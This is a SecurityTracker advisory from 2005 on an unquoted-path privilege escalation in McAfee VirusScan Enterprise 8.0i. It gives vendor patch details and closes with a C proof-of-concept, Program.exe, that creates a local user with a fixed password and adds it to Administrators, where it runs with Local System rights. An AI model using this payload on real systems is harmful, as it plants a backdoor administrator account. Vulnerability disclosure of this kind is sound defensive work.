SecurityTracker.com
Category:   Application (Security)  >   McAfee VirusScan
Vendors:   McAfee
McAfee VirusScan Bug in 'naPrdMgr.exe' Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1015404
SecurityTracker URL:  http://securitytracker.com/id/1015404
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Dec 23 2005
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): Enterprise Version 8.0i Patch 11
Description:   A vulnerability was reported in McAfee VirusScan. A local user can gain elevated privileges on the target system.

The 'naPrdMgr.exe' process invokes a particular binary application (EntVUtil.EXE) in an unsafe manner. A local user can create a specially named file containing arbitrary code. When McAfee VirusScan attempts to invoke the application, the specially named file will be invoked instead and the arbitrary code will be executed with Local System privileges.

The software intends to run the 'C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE' file, but because the path is not quoted it will first attempt to run 'C:\Program.exe' and then 'C:\Program Files\Network.exe'.

McAfee Common Management Agent 3.5 Patch 5 is also affected.

Reed Arvin discovered this vulnerability.

The original advisory is available at:

http://reedarvin.thearvins.com/20051222-01.html

Impact:   A local user can gain Local System privileges on the target system.
Solution:   The vendor has issued a fixed version (Patch 12).

The vendor's knowledge base article (kb45256) is available at:

http://knowledgemap.nai.com/KanisaSupportSite/search.do?cmd=displayKC&externalId=KBkb45256xml

Vendor URL:  www.mcafee.com/
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA 3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because of a lack of quotes the naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run C:\Program
Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named Program.exe and place it on the
root of the C:\ and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
below.

Vulnerable Versions:
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/ )

 
 



Copyright 2019, SecurityGlobal.net LLC